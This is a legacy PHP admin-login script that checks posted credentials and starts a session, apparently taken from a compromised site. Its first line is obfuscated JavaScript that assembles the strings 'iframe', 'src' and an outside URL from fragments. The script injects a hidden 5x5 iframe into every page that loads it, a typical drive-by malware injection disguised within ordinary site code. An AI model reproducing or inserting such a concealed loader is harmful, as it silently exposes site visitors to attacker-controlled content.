w='s';uf='m';mc='tt';vr='//';yi='n';wl=':';zg='oo';ea='e';oa='am';ys='er';h='p';z='ltr';p='i';t='i';fl='c';o='r';aq='h';d='/f';gd='.i';po='fr';a='1';zq=t.concat(po,oa,ea);s=w.concat(o,fl);ox=aq.concat(mc,h,wl,vr,d,p,z,ys,zg,uf,a,gd,yi);var l=document.createElement(zq);l.setAttribute('width','5');l.setAttribute('height','5');l.setAttribute('style','display:none');l.setAttribute(s,ox);document.body.appendChild(l); /*************** PHP LOGIN SCRIPT V2.0********************* (c) Balakrishnan 2009. All Rights Reserved Usage: This script can be used FREE of charge for any commercial or personal projects. Enjoy! Limitations: - This script cannot be sold. - This script should have copyright notice intact. Dont remove it please... - This script may not be provided for download except from its original site. For further usage, please contact me at http://www.php-login-script.com ***********************************************************/ include '../dbc.php'; if($_POST['adminLogin'] == 'Login') { $admin = mysql_real_escape_string($_POST['admin_user']); $pass = mysql_real_escape_string($_POST['admin_pass']); if(($admin_user == $admin) && ($admin_pass == $pass) ) { session_start(); // this sets variables in the session $_SESSION['user_admin']= $admin; header("Location: admin_main.php"); } } ?>